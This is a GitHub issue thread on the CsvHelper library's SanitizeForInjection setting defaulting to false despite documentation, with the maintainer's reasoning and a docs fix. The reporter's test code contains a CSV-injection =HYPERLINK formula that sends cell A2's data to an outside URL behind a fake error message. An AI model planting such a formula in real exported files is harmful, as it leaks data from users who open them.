### ISSUE TITLE
SanitizeForInjection not true by default

### ISSUE THREAD

**Issue by bryn500** [JoshClose/CsvHelper#1586]
**Describe the bug**
When creating a new instance of the CsvConfiguration the SanitizeForInjection property is set to false.
In the documentation it seems to imply that this will be true by default: https://joshclose.github.io/CsvHelper/examples/writing

**To Reproduce**
Steps to reproduce the behaviour:
1. var config = new CsvConfiguration(new CultureInfo("en-GB"));
2. Check value of config.SanitizeForInjection

**Expected behavior**
Given the documentation: when creating a new instance of the CsvConfiguration class the SanitizeForInjection property is set to true. 
So that when this is then passed into CsvWriter constructor the characters in InjectionCharacters array are properly escaped by the default \t  InjectionEscapeCharacter without having to manually specify config.SanitizeForInjection = true;

**Additional context**
In case I'm doing something wrong, below is everything else from my setup, with a test injection
```
var config = new CsvConfiguration(new CultureInfo("en-GB"));

using var ms = new MemoryStream();
using var sw = new StreamWriter(stream: ms, encoding: new UTF8Encoding(true));
using (var cw = new CsvWriter(sw, config))
{
    cw.WriteField("=HYPERLINK(\"https://google.com?leak=\\\"&A2,\"Error: please click for further information\")");    
    cw.NextRecord();
    cw.WriteRecords(items);
}
return File(ms.ToArray(), "text/csv", "test.csv");
```

**Comment by JoshClose** [comment]
The default was changed to false and the documentation was never updated. I'll have to update the documentation.

**Comment by carlosmunozrodriguez** [comment]
The documentation is still not updated.
Also why is the default `off`? It should be secure by default

**Comment by samuel-knutson** [comment]
Documentation is still not updated. I agree it should be secure by default, as discussed in #724.

**Comment by JoshClose** [comment]
It's off by default because it has nothing to do with a CSV file. You can read/write data all day and not have issues with it. It becomes an issue when you open the file in another program that doesn't handle it properly. Also, you're the one writing the file. Why are you writing malicious data files and why would you turn on sanitization if you were doing that? Yes, there could be user input stored in there that could cause that. When reading and `SanitizeForInjection` is on, should it be stripping the `\t` from the beginning of every field? This is a lot of extra needless work if you just want a CSV file.

The docs have been updated. The link was broken, so a new one is used.

**Comment by samuel-knutson** [comment]
Thank you for updating the docs and explaining your reasoning. (And thank you for this library!)
